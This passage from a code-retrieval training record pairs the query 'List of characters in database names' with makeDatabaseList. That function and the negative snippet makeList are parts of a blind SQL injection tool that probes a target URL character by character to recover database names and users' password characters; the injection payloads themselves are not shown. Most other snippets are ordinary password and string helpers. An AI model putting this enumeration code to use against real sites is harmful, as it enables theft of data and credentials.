<= val <= 96:\n\t\t\t\tchar = chr( val )\n\n\t\tvalid_idx = False\n\t\tidx = -1\n\t\twhile not valid_idx:\n\t\t\tidx = random.randint(0, 7)\n\t\t\tif not pwd[ idx ]:\n\t\t\t\tvalid_idx = True\n\t\t\n\t\tpwd[ idx ] = char\n\n\tpwd = ''.join( pwd )\n\tos.system( 'cls' )\n\tprint( pwd )", "def get_user_password(text):\n return getpass.getpass(text)", "def is_valid_password_v1(password):\n letter_count = sum([x == password[\"letter\"] for x in list(password[\"password\"])])\n return password[\"low\"] <= letter_count <= password[\"high\"]", "def get_verified_password(self):\n return self.controller.dbfilter.db.get('passwd/user-password-again')", "def password_alphabetical(i):\r\n\r\n return ''.join(_random.choice(string.ascii_letters) for x in\r\n range(i))", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? 
At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def anypassword():\n\n characters = string.ascii_uppercase + string.ascii_lowercase + string.digits\n size = random.randint(8, 12)\n password = ''.join(random.choice(characters) for x in range(size))\n\n return password", "def get_help_text(self):\n msg = (\n ungettext(\n \"Your password must contain %d or more Non-Alphanumeric character.\",\n \"Your password must contain %d or more Non-Alphanumeric characters.\",\n self.get_min_count(),\n )\n % self.get_min_count()\n )\n return msg", "def first_login_aux(password: str, password_repeat: str) -> [bool]:\n return [\n pw_is_viable(password),\n compare_digest(password_repeat, password)\n ]", "def main():\n\n print(\"Password Generator Service\")\n # If no input is given by user then the maximum length password is genearted\n lengthOfPassword = int(input(\"Enter length of password (8 or greater) or leave blank to generate a password of maximum length i.e. 77 characters\\n\") or int(77))\n # Additional Input Validation\n if lengthOfPassword < 8 or lengthOfPassword > 77:\n print(\"Invalid Entry. Enter a value that is 8 or greater and less than 77 characters as they make secure passwords. Please try again\")\n sys.exit()\n\n upperCaseLowerLimit = 65\n upperCaseUpperLimit = 90\n\n lowerCaseLowerLimit = 97\n lowerCaseUpperLimit = 122\n\n specialSymbolsLowerLimit = 33\n specialSymbolsUpperLimit = 47\n\n upperCaseList = [chr(i) for i in range(upperCaseLowerLimit, upperCaseUpperLimit + 1)]\n lowerCaseList = [chr(i) for i in range(lowerCaseLowerLimit, lowerCaseUpperLimit + 1)]\n specialSymbolsList = [chr(i) for i in range(specialSymbolsLowerLimit, specialSymbolsUpperLimit + 1)]\n numbersList = [i for i in range(0,10)]\n\n \"\"\"\n To generate random characters of even greater length the list might have to be duplicated\n This has not be done now due to practical reasons.\n Sample code for doing so can be seen below\n random.sample(upperCaseList*2, len(upperCaseList)*2)\n \"\"\"\n possibleSymbols = random.sample(upperCaseList, len(upperCaseList)) + random.sample(lowerCaseList, len(lowerCaseList)) \\\n + random.sample(specialSymbolsList, len(specialSymbolsList)) + random.sample(numbersList, len(numbersList))\n # the core functionality that determines the complex password\n random.shuffle(possibleSymbols)\n\n finalPassword = ''.join(str(s) for s in possibleSymbols[:lengthOfPassword])\n\n print(\"Your new password of length {} is generated ==> {}\".format(lengthOfPassword, finalPassword))", "def valid_password(password: Text):\n results = Utility.password_policy.test(password)\n if results:\n response = []\n for result in results:\n if isinstance(result, Length):\n response.append(\"Password length must be \" + str(result.length))\n elif isinstance(result, Special):\n response.append(\"Missing \" + str(result.count) + \" special letter\")\n elif isinstance(result, Uppercase):\n response.append(\"Missing \" + str(result.count) + \" uppercase letter\")\n elif isinstance(result, Numbers):\n response.append(\"Missing \" + str(result.count) + \"number\")\n\n if response:\n raise AppException(\"\\n\".join(response))", "def 
find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def get_help_text(self):\n msg = (\n ungettext(\n \"Your password must contain %d or more alphabetic letter.\",\n \"Your password must contain %d or more alphabetic letters.\",\n self.get_min_count(),\n )\n % self.get_min_count()\n )\n return msg", "def test_check_password():\n assert check_password('Longpassword') == False\n assert check_password('123456') == False\n assert check_password('short') == False\n assert check_password('C0rect') == False\n assert check_password('Correct8') == True", "def prompt_pass():\n msg = \"Enter Password: \"\n password = getpass.getpass(msg)\n return password", "def makeList(username, url, caseSensitive = False, wildCards = True):\n charList = []\n for ch in lower:\n # check for ch in \n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in numbers:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in special:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in other:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n if(caseSensitive):\n for ch in upper:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n if(wildCards):\n for ch in wildcards:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n return charList", "def test_find_string():\n assert pi_finder.find_string('j', hex_dict) == (5, 6)\n assert pi_finder.find_string('l', hex_dict) == (61, 62)\n assert pi_finder.find_string('c', hex_dict) == (72, 73)", "def checkUserPassword(password):\n c.execute(\"select pwd from users where pwd = ?\", (password,))\n if c.fetchall():\n return True\n return False", "def validatePassword(password):\n\n if not(password):\n return \"You must specify your archive.org password.\"", "def decode(text, password):\r\n\tstep_index = 0\r\n\tdecoded_text = ''\r\n\tfor letter in text:\r\n\t\tdecoded_text += prev_letter(letter, to_int(password[step_index]))\r\n\t\tstep_index += 1\r\n\t\tif step_index > len(password)-1:\r\n\t\t\tstep_index = 0\r\n\treturn decoded_text", "def get_password(username):\n passw = None\n html = requests.get('https://'+ username + '/accounts').text\n\n match = RE_PASS.search(html)\n if match:\n passw = match.groups()[1]\n \n return passw.strip() if passw else None", "def get_credentials():\n user = input(\"Login: \")\n pwd = None\n while not pwd:\n pwd = getpass()\n pwd_verify = getpass('Re-enter password: ')\n if pwd != pwd_verify:\n print(\"Passwords do not match. 
Try again.\")\n pwd = None\n return user, pwd", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def password(): \n\n dice_list = []\n for i in range(5):\n dice_list.append(secrets.choice(range(1,7)))\n dice_key = ''.join(str(x) for x in dice_list)\n return word_dict[dice_key]", "def ask_user():\r\n password_lenght = 0\r\n while password_lenght == 0:\r\n try:\r\n password_lenght = int(input(\"How long password you want? Enter the number... \"))\r\n if password_lenght <= 0:\r\n print(\"Try to enter any number greater than 0...\")\r\n continue\r\n return password_lenght\r\n except Exception:\r\n continue", "def count_valid_passwords(passwords, validator):\n count = len(list(filter(validator, passwords)))\n print(f\"Found {count} valid passwords\")\n return count", "def getpass(self, type='IRC'):\n try:\n return self.data.passwords[type]\n except KeyError: return", "def get_bad_char(self, string, size):\n bad_char = [-1] * self.NO_OF_CHARS\n for i in range(size):\n # ord('A') == chr(65)\n bad_char[ord(string[i])] = i\n\n return bad_char" ]
[ "0.71826273", "0.6203832", "0.6179515", "0.6156986", "0.61567867", "0.60574234", "0.6030019", "0.59959686", "0.59700435", "0.5946914", "0.5921345", "0.5909927", "0.5908256", "0.58809274", "0.5878235", "0.5816463", "0.5804979", "0.5787845", "0.5780203", "0.57457215", "0.57276505", "0.57061714", "0.56991327", "0.5696502", "0.56824", "0.56646657", "0.56593484", "0.554374", "0.55170935", "0.54889387", "0.5488624", "0.54753053", "0.54709226", "0.5460054", "0.5458399", "0.5442453", "0.54064155", "0.5388815", "0.5381073", "0.5374619", "0.5372235", "0.5365271", "0.5346822", "0.53415304", "0.5322688", "0.5313276", "0.5306224", "0.5290582", "0.5284623", "0.52774435", "0.5266996", "0.52500397", "0.52437717", "0.5233768", "0.5233768", "0.523184", "0.5230006", "0.52176505", "0.52131087", "0.52127284", "0.52101624", "0.52039045", "0.51999295", "0.5197193", "0.5193874", "0.51898724", "0.5189013", "0.5171414", "0.51630574", "0.51613504", "0.51546735", "0.5153065", "0.51518655", "0.5145282", "0.5130778", "0.5129122", "0.5120669", "0.5114207", "0.51079863", "0.51079863", "0.51079863", "0.51079863", "0.50936604", "0.50865626", "0.50714594", "0.5071445", "0.5062734", "0.5061607", "0.50575644", "0.5054311", "0.5045905", "0.5044882", "0.50405246", "0.50405246", "0.50405246", "0.5040087", "0.5036907", "0.5036633", "0.50348866", "0.50328493" ]
0.77611613
0
List of characters in table names
def makeTableList(url, caseSensitive = False, wildCards = True):
    # Probe every candidate character against the blind-injection oracle
    # characterInTableName() and collect the ones confirmed to occur in a
    # table name on the target at `url`.
    charList = []
    for ch in lower:
        if(characterInTableName(ch, url)):
            charList.append(ch)
    for ch in numbers:
        ch = str(ch)
        if(characterInTableName(ch, url)):
            charList.append(ch)
    for ch in special:
        ch = str(ch)
        if(characterInTableName(ch, url)):
            charList.append(ch)
    for ch in other:
        ch = str(ch)
        if(characterInTableName(ch, url)):
            charList.append(ch)
    if(caseSensitive):
        for ch in upper:
            if(characterInTableName(ch, url)):
                charList.append(ch)
    if(wildCards):
        for ch in wildcards:
            if(characterInTableName(ch, url)):
                charList.append(ch)
    return charList
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def table_names(self, cursor=None):\r\n return [kind.key().name() for kind in Query(kind='__kind__').Run()]", "def makeTableNamesList(n, ):", "def get_table_column_name(self, table):\n c = self.conn.cursor()\n c.execute(\"SELECT * FROM %s\" % table)\n names = list(map(lambda x: x[0], c.description))\n return names", "def get_table_names() -> Iterable[str]:\n for pipeline_name in get_pipeline_names():\n yield pipeline_name.replace(\"_\", \"-\")", "def table_name() -> str:\n pass", "def scrub(self, table_name):\n\n return ''.join( chr for chr in table_name if chr.isalnum() )", "async def tables(self) -> List[bytes]:\n names = await self.client.getTableNames()\n\n # Filter using prefix, and strip prefix from names\n if self.table_prefix is not None:\n prefix = self._table_name(b'')\n offset = len(prefix)\n names = [n[offset:] for n in names if n.startswith(prefix)]\n\n return names", "def getTableNames(self):\n\n # The specific command depends on whether we are using mysql or sqlite\n if self.connector == 'mysql':\n sqlcmd = (\"SELECT table_name FROM INFORMATION_SCHEMA.TABLES \" +\n \"WHERE table_schema='\" + self.dbname + \"'\")\n else:\n sqlcmd = \"SELECT name FROM sqlite_master WHERE type='table'\"\n\n self._c.execute(sqlcmd)\n tbnames = [el[0] for el in self._c.fetchall()]\n\n return tbnames", "def show_tables(self) -> List[str]:\n return list(self.tb.keys())", "def getAllName(table):\n\ttry:\n\t\tcon = sqlite3.connect('PampDb.db')\n\t\tcur = con.cursor()\n\t\tcur.execute(\"SELECT * FROM \" + table)\n\t\tnames = cur.fetchall()\n\t\tcon.commit()\n\t\tcon.close()\n\t\treturn names\n\texcept:\n\t\tprint('Could not run function getAllName from DbController')", "def _extract_ks_tab(name):\n sp = name.split(\".\")\n if len(sp) == 2:\n ksp = sp[0]\n table = sp[1]\n else:\n ksp = config.execution_name\n table = name\n return ksp.lower().encode('UTF8'), table.lower().encode('UTF8')", "def get_table_names(conn, schema, prefix='', suffix=''):\n query = f\"select table_name from information_schema.tables where table_schema = '{schema}'\"\n table_names = pd.read_sql(query, con=get_connection()).to_numpy(copy=True).flatten()\n table_names = [t for t in table_names if t.startswith(prefix) and t.endswith(suffix)]\n return table_names", "def getTableNames(self):\n\tif not self.dbNames:\n\t # get db table names from DB\n\t if self.dbType==\"sqlite\":\n\t query=\"SELECT name FROM sqlite_master WHERE type='table';\"\n\t elif self.dbType==\"mysql\":\n\t query=\"SHOW TABLES\"\n\t self.startTxn(\"SQLUtil.__init__\")\n\t tup=self.fetchAll(query)\n\t self.endTxn(\"SQLUtil.__init__\")\n\t for item in tup:\n\t self.dbNames.append(item[0])\n\treturn self.dbNames", "def getTables(self):\n\treturn self.dbNames", "def names(self) -> list[str]:", "def colNames_string(self):\n # SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'some_table';\n return \"SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = \"", "def _table_name(self, name: AnyStr) -> bytes:\n name = ensure_bytes(name)\n if self.table_prefix is None:\n return name\n return self.table_prefix + self.table_prefix_separator + name", "def get_table_names(self):\n return self.engine.table_names()", "def symbol_table(self) -> str:\n return self._symbol_table", "def tablename(self):\n _, tail = os.path.split(self.url)\n return tail[:-4]", "def encodeTableName(self, schema, table):\r\n return '\"{}\".\"{}\"'.format(schema, table)", "def standardize_table_name(self, schema_name: str, table: str) -> str:\n return table", "def 
names(cls) -> List[str]:", "def Fetch_All_Table_Names(self, d_params=None):\n ctx = self.__Connect_To_Snowflake(d_params)\n all_tables = ctx.cursor().execute(\"show tables\")\n ctx.close()\n return [x[1] for x in all_tables]", "def clean_table_name(table_name):\n path_underscore = table_name.translate(table_name.maketrans(\"-. \", \"___\"))\n return \"_\".join(filter(None, path_underscore.split(\"_\")))", "def listOSWTables(conn):\n conn_cursor = conn.cursor()\n conn.text_factory = str\n res = conn.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n tables=[name[0] for name in res]\n return tables", "def test_table_name(self):\n obs = PrepTemplate._table_name(1)\n self.assertEqual(obs, \"prep_1\")", "def _prepare_tables_string(tables_list):\n tables_string = \"\"\n for table in tables_list:\n tables_string = \"{0} {1}\".format(tables_string, table)\n return tables_string", "def get_colnames(self):\n\n cd = self.conn.execute('select * from atom')\n print('Possible column names are:')\n names = list(map(lambda x: x[0], cd.description))\n print('\\trowID')\n for n in names:\n print('\\t'+n)", "def tableName():\n return \"people\"", "def table_col(file_name='tpch'):\n \n path = './data/' + file_name + \"/sql/{}-create.sql\".format(\"tpch\")\n regex = re.compile(';\\($')\n \n tbl_name = {}\n tbl = \"\"\n with open(path, 'r') as f:\n for line in f.readlines():\n if \"CREATE TABLE\" in line:\n tbl = line.split()[2]\n tbl_name[tbl.lower()] = []\n elif line != \"\\n\" and ');' not in line and regex.search(line) == None:\n col = line.split()[0]\n tbl_name[tbl.lower()].append(col.lower())\n return tbl_name", "def names():\n pass", "def get_table_names(self,verbose=False):\n \n assert(self.connected)\n \n \n GET_TABLE_NAMES_COMMAND = \"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = '{0}'\".format(self.config['database'])\n \n self.cursor.execute(GET_TABLE_NAMES_COMMAND)\n \n tables = []\n for row in self.cursor:\n tables.append(row[0])\n \n return tables", "def table_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"table_name\")", "def s3_table_random_name():\n\n alpha = \"abcdefghijklmnopqrstuvwxyz\"\n return ''.join(random.choice(alpha) for _ in range(8))", "def list_tables(self, context=\"MYDB\"):\n q = 'SELECT Distinct TABLE_NAME FROM information_schema.TABLES'\n res = self.quick(q, context=context, task_name='listtables', system=True)\n # the first line is a header and the last is always empty\n # also, the table names have \" as the first and last characters\n return list(res[\"TABLE_NAME\"])", "def get_tables(self, db_name):\n pass", "def _str_colnames(self):\n return ', '.join(self.galcat.colnames)", "def makeDatabaseNamesList(n, ):", "def getTableByName(self, tablename):\n pass", "def extract_ks_tab(name):\n if not name:\n return None, None\n\n sp = name.split(\".\")\n if len(sp) == 2:\n ksp = sp[0]\n table = sp[1]\n else:\n ksp = config.execution_name\n table = name\n return ksp.lower(), table.lower()", "def get_colnames(cur, table):\n cur.execute(\"\"\"DESCRIBE {}\"\"\".format(table))\n cols = cur.fetchall()\n return [col[0] for col in cols]", "def table_name(self) -> str:\n return \"OLTP\"", "def _get_fields(self):\n fields = self.table[0]\n fields = filter(None.__ne__, fields)\n return list(map(str.lower, fields))", "def tablename(klass):\n if not hasattr(klass, 'TABLENAME'):\n inf = Inflector()\n klass.TABLENAME = inf.tableize(klass.__name__)\n return klass.TABLENAME", "def get_list_from_table(sqlite_connection, table_name):\n\n def 
camelize(s): # 'aa_bb_cc_dd' --> 'AaBbCcDd'\n return \"\".join(word.title() for word in s.split(\"_\"))\n\n cursor = sqlite_connection.execute(f\"SELECT * FROM {table_name}\")\n col_names = \" \".join(col_desc[0] for col_desc in cursor.description)\n nt = collections.namedtuple(camelize(table_name), col_names)\n return [nt(*row) for row in cursor.fetchall()]", "def getTableKeys(self, tableName):\n sql = \"SHOW COLUMNS FROM %s\" % tableName\n resultSet = []\n try:\n results = self.selectOpt(sql)\n for r in results:\n resultSet.append(r['Field'])\n except:\n print(\"[ERROR] Table '%s' does not exist.\" % tableName)\n return resultSet", "def test_split_table_name(self):\n\n self.assertEqual(\n {\"database\": \"database\", \"database_schema\": \"schema\", \"table\": \"table\"},\n fqn.split_table_name(table_name=\"database.schema.table\"),\n )\n\n self.assertEqual(\n {\"database\": None, \"database_schema\": \"schema\", \"table\": \"table\"},\n fqn.split_table_name(table_name=\"schema.table\"),\n )\n\n self.assertEqual(\n {\"database\": None, \"database_schema\": None, \"table\": \"table\"},\n fqn.split_table_name(table_name=\"table\"),\n )\n\n # We also clean quotes\n self.assertEqual(\n {\"database\": \"database\", \"database_schema\": \"schema\", \"table\": \"table\"},\n fqn.split_table_name(table_name='database.\"schema\".table'),\n )", "def _exceptions_lists_tblname(self):\n return 'exceptions_lists'", "def selectnamesC(data):\n col = []\n for name in list(data):\n if name.startswith('headstrong_'):\n col.append(name)\n else:\n col = col\n \n return col", "def column_names(\n self,\n table: exp.Table | str,\n only_visible: bool = False,\n dialect: DialectType = None,\n normalize: t.Optional[bool] = None,\n ) -> t.List[str]:", "def getNames(self) -> List[unicode]:\n ...", "def tables(self):\n if self.table is None:\n raise GiraffeError(\"Target table has not been set.\")\n return [\n \"{}_wt\".format(self.table),\n \"{}_log\".format(self.table),\n \"{}_e1\".format(self.table),\n \"{}_e2\".format(self.table),\n ]", "def tables_dict(self):\n return self.tables.table_name_map", "def get_name(tablename):\n\n return tablename[tablename.find(\"_\") + 1:].replace(\"_\", \" \").capitalize()", "def get_table_list(self):\n # the \\\"{{}}\\\" is where the sql command will be added via a second `.format()`\n container_command = \"docker exec {} sh -c \\\"{{}}\\\"\".format(self.mysql_container)\n sql_command = \"mysql {} --execute='SHOW TABLES FROM {};'\".format(self.mysql_credentials, self.database_name)\n table_list = self.shell(container_command.format(sql_command))\n table_list = table_list.split(\"\\n\")\n assert table_list[0] == \"Tables_in_{}\".format(self.database_name)\n return table_list[1:]", "def selectnamesD(data):\n col = []\n for name in list(data):\n if name.startswith('hyperactive_'):\n col.append(name)\n else:\n col = col\n \n return col", "def table_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"table_name\")", "def table_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"table_name\")", "def table_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"table_name\")", "def __random_table_name(self):\n return 'tmp_%s_%s' % (self._xid(), ''.join(\n random.choice('abcdefghijklmnopqrstuvwxyz')\n for _ in range(8)\n ))", "def showTables(database: str) -> list:\n\n bd = _database(database)\n\n if bd:\n\n temp = []\n\n for tabla in bd[\"tablas\"]:\n temp.append(tabla[\"nombre\"])\n\n return temp\n\n else:\n return None", "def find_table_command(input_file):\n 
contents = open(input_file, 'r')\n file = \"\".join(contents)\n table_title = find_table(input_file)[1]\n table_command =[]\n for title in table_title:\n stString = 'CREATE TABLE '+str(title)+ ' ('\n start = file.find(stString)\n end = file.find(');', start)\n word_list = file[start+len(stString):end].split(',')\n table_command.append(stString+ ','.join(word_list)+');')\n\n return table_command", "def _get_escape_translation_table(cls) -> List[str]:\n _escape_table = [chr(x) for x in range(128)]\n _escape_table[0] = \"\\\\0\"\n _escape_table[ord(\"\\\\\")] = \"\\\\\\\\\"\n _escape_table[ord(\"\\n\")] = \"\\\\n\"\n _escape_table[ord(\"\\r\")] = \"\\\\r\"\n _escape_table[ord(\"\\032\")] = \"\\\\Z\"\n _escape_table[ord('\"')] = '\\\\\"'\n _escape_table[ord(\"'\")] = \"\\\\'\"\n return _escape_table", "def _get_char_names(self):\n return [device.get_char_name() for\n device in self.all_devices]", "def __tablename__(self):\n return sub(r\"(?<!^)(?=[A-Z])\", \"_\", self.__name__).lower()", "def columns(self, table_name):\n table = self._create_table(table_name)\n return [c.name for c in table.c]", "def table_columns(auth, table_name):\n return [row[0] for row in DBMySQL.csfr(auth, \"describe \" +table_name)]", "def meta_db_tables(self) -> list:\r\n def _passer(**kwargs):\r\n data = self.engine.execute(\"\"\"\r\n SELECT * FROM sqlite_master WHERE type='table';\r\n \"\"\").fetchall()\r\n table_names = [i[1] for i in data]\r\n return table_names\r\n return self._connectionController(_passer)", "def tablename(entity) -> str:\n return entity.__tablename__", "def delta_table_name(self):\n if len(self._old_table.name) < constant.MAX_TABLE_LENGTH - 10:\n return constant.DELTA_TABLE_PREFIX + self._old_table.name\n elif (\n len(self._old_table.name) >= constant.MAX_TABLE_LENGTH - 10\n and len(self._old_table.name) < constant.MAX_TABLE_LENGTH - 2\n ):\n return constant.SHORT_DELTA_TABLE_PREFIX + self._old_table.name\n else:\n return constant.DELTA_TABLE_PREFIX + constant.GENERIC_TABLE_NAME", "def test_table_name(self):\n obs = SampleTemplate._table_name(self.test_study.id)\n self.assertEqual(obs, \"sample_1\")", "def _exceptions_lists_delta_part_tblname(self, operator_id):\n return '{0}_{1}'.format(self._exceptions_lists_delta_tblname, operator_id)", "def named_entities(self) -> List[str]:", "def _exceptions_lists_part_tblname(self, operator_id):\n return '{0}_{1}'.format(self._exceptions_lists_tblname, operator_id)", "def get_table_name(self):\n return self._table", "def query_tables(self):\n # Find all tables\n tables_q = \"SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE \\'sqlite_%\\';\"\n tables = self.query(tables_q)\n # print(tables)\n return tables", "def tname(self) -> str:", "def names(self) -> List:\n ...", "def stores(self):\n sql = u\"SELECT name FROM `sqlite_master` WHERE type='table'\"\n rows = self.conn.execute(sql)\n return [r['name'] for r in rows\n if r['name'] not in self.invalid_names]", "def show_tables(db_name):\n output = execute_sql(db_name, \"SELECT name FROM sqlite_master WHERE type='table';\")\n return output", "def name(self) -> str:\n return self.fqtable.replace(\".\", \"_\")", "def getTableHead():\n return [\"Reporter\", \"Reportee\", \"aln. DKIM\", \"aln. 
SPF\", \"Disposition\",\n \"DKIM result\", \"SPF result\", \"msg#\", \"IP\", \"Country\",\n \"Report Begin\", \"Report End\", \"Report ID\"]", "def show_tables(self):\n query = \"SELECT name FROM sqlite_master WHERE type = 'table'\"\n try:\n temp = self.__cur.execute(query)\n except Exception as e:\n self.__conn.rollback()\n raise e\n\n tables = []\n for x in temp:\n tables.append(x[\"name\"])\n del temp\n return tables", "def tables(self):\n result = self.execute(self.commands.get_tables(self.name))\n return [x[0] for x in result]", "def generate_rename_tabled(self, prefix):\n return \"#define %s%s g_symbol_table.%s\" % (prefix, self.__name, self.__name)", "def names(self):\n\t\treturn", "def searchColumnHeadings(self, table: Table):\n lista = []\n if table:\n for col in table.columns:\n lista.append(col.name)\n return lista\n return None", "def get_tables(conn):\n cur = conn.cursor()\n cur.execute(\"\"\"SELECT name FROM sqlite_master\n WHERE type='table' AND name NOT LIKE 'sqlite_%';\n \"\"\")\n tables = cur.fetchall()\n\n return tables", "def tables(self) -> list:\n return self.list_tables()", "def getTableNames(self, lsstLevel, dbName):\n return self._doRequest(self.httpClient.getTableNames, lsstLevel, dbName)", "def name(self) -> str:\n return f\"lookup_table_{self.table_number}\"", "def table_name_unpacker(from_string: str, separator: str = \",\") -> List[Tuple[str, str]]:\n\n if not from_string or not from_string.strip():\n raise ValueError(\"The string containing the from clause is missing or empty.\")\n\n tables = []\n table_names = from_string.split(separator)\n for table in table_names:\n table = table.strip()\n table = table.split(\" \")\n if len(table) == 2:\n tables.append((table[0], table[1]))\n elif len(table) == 1:\n tables.append((table[0], \"\"))\n\n return tables", "def __getFontTable(self):\n\n fontTable = \"{\\\\fonttbl\\n\"\n for font in self.fonts:\n fontTable += \"%s\\n\" % font.getRtf()\n return fontTable + \"}\\n\"", "def get_split_col_names():\n return ['dna_%d' % (idx+1) for idx in range(60)]", "def getColumnNames(self, tablename):\n\n # Check if tablename exists in database\n if tablename in self.getTableNames():\n # The specific command depends on whether we are using mysql or\n # sqlite\n if self.connector == 'mysql':\n sqlcmd = \"SHOW COLUMNS FROM \" + tablename\n self._c.execute(sqlcmd)\n columnnames = [el[0] for el in self._c.fetchall()]\n else:\n sqlcmd = \"PRAGMA table_info(\" + tablename + \")\"\n self._c.execute(sqlcmd)\n columnnames = [el[1] for el in self._c.fetchall()]\n\n return columnnames\n\n else:\n print('Error retrieving column names: Table does not exist on ' +\n 'database')\n return []", "def __tablename__(cls) -> str:\n return inflection.underscore(cls.__name__)", "def get_feature_names(self):\n return [self.char]", "def get_names(view, sel):\n word = view.word(sel)\n schema = None\n if view.substr(word.begin() - 1) == '.':\n schema = view.substr(view.word(word.begin() - 2)).lower()\n return schema, view.substr(word).lower()", "def get_tables_from_db(self):\r\n self.cursor.execute(\"SELECT name FROM sqlite_master WHERE type = 'table';\")\r\n\r\n # Return list of tuples with the names of tables --> names of profiles.\r\n self.profiles_name_list = [elem[0] for elem in self.cursor.fetchall()]\r\n self.profiles_name_list = tuple(self.profiles_name_list)" ]
[ "0.6977511", "0.68698466", "0.66727006", "0.6658325", "0.6603546", "0.65911764", "0.6573043", "0.6499986", "0.6483981", "0.6470874", "0.6378552", "0.6191215", "0.61647415", "0.614972", "0.61342114", "0.610629", "0.6102741", "0.6078974", "0.60369515", "0.5990207", "0.5947591", "0.5935245", "0.58472365", "0.58406013", "0.5825376", "0.5823207", "0.5817067", "0.5812491", "0.5791166", "0.5771058", "0.5763561", "0.5748314", "0.5735055", "0.5732467", "0.5718774", "0.57170093", "0.57164747", "0.5705593", "0.570374", "0.5700912", "0.56985927", "0.56978196", "0.5685264", "0.5674141", "0.56707734", "0.56693226", "0.566613", "0.56529766", "0.56482077", "0.5641952", "0.56402624", "0.56376195", "0.5637251", "0.56357855", "0.56270856", "0.5624137", "0.5613276", "0.5611919", "0.5611919", "0.5611919", "0.5607274", "0.55963176", "0.559204", "0.55867857", "0.55866766", "0.5585967", "0.5580438", "0.55797327", "0.5575031", "0.5574478", "0.5574022", "0.5572378", "0.55556405", "0.5550132", "0.55428064", "0.55397356", "0.5532043", "0.5528734", "0.55269766", "0.5508176", "0.5505703", "0.550026", "0.54891133", "0.5484301", "0.548266", "0.5478682", "0.5472434", "0.5468696", "0.546395", "0.54626495", "0.5459807", "0.54589516", "0.5446277", "0.54250354", "0.54216325", "0.5419601", "0.54115", "0.5404347", "0.54042757", "0.5399363" ]
0.57981765
28
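makeTableList above and makeDatabaseList below repeat the same loop once per character class, differing only in the oracle they call. A minimal consolidated sketch of that pattern, assuming concrete contents for the module-level character classes (lower, numbers, special, other, upper, wildcards) that the originals reference but do not define in this snippet:

import string

# Stand-ins for the module-level character classes the original functions
# iterate over; the real values live elsewhere in the source repo, so these
# concrete contents are assumptions.
LOWER = list(string.ascii_lowercase)
UPPER = list(string.ascii_uppercase)
NUMBERS = [str(d) for d in range(10)]
SPECIAL = list("!#$&()*+,-./:;<=>?@[]^{|}~")
OTHER = ["_", " "]
WILDCARDS = ["%", "_"]

def enumerate_chars(probe, case_sensitive=False, wild_cards=True):
    """Collect every candidate character the oracle confirms.

    `probe` is a callable such as lambda ch: characterInTableName(ch, url);
    it should return True when the blind-injection oracle reports that `ch`
    occurs in the target identifier.
    """
    classes = [LOWER, NUMBERS, SPECIAL, OTHER]
    if case_sensitive:
        classes.append(UPPER)
    if wild_cards:
        classes.append(WILDCARDS)
    found = []
    for char_class in classes:
        for ch in char_class:
            if probe(ch) and ch not in found:
                found.append(ch)
    return found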
List of characters in database names
def makeDatabaseList(url, caseSensitive = False, wildCards = True):
    # Same oracle-driven enumeration as makeTableList, probing database
    # names via characterInDatabaseName() instead of table names.
    charList = []
    for ch in lower:
        if(characterInDatabaseName(ch, url)):
            charList.append(ch)
    for ch in numbers:
        ch = str(ch)
        if(characterInDatabaseName(ch, url)):
            charList.append(ch)
    for ch in special:
        ch = str(ch)
        if(characterInDatabaseName(ch, url)):
            charList.append(ch)
    for ch in other:
        ch = str(ch)
        if(characterInDatabaseName(ch, url)):
            charList.append(ch)
    if(caseSensitive):
        for ch in upper:
            if(characterInDatabaseName(ch, url)):
                charList.append(ch)
    if(wildCards):
        for ch in wildcards:
            if(characterInDatabaseName(ch, url)):
                charList.append(ch)
    return charList
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
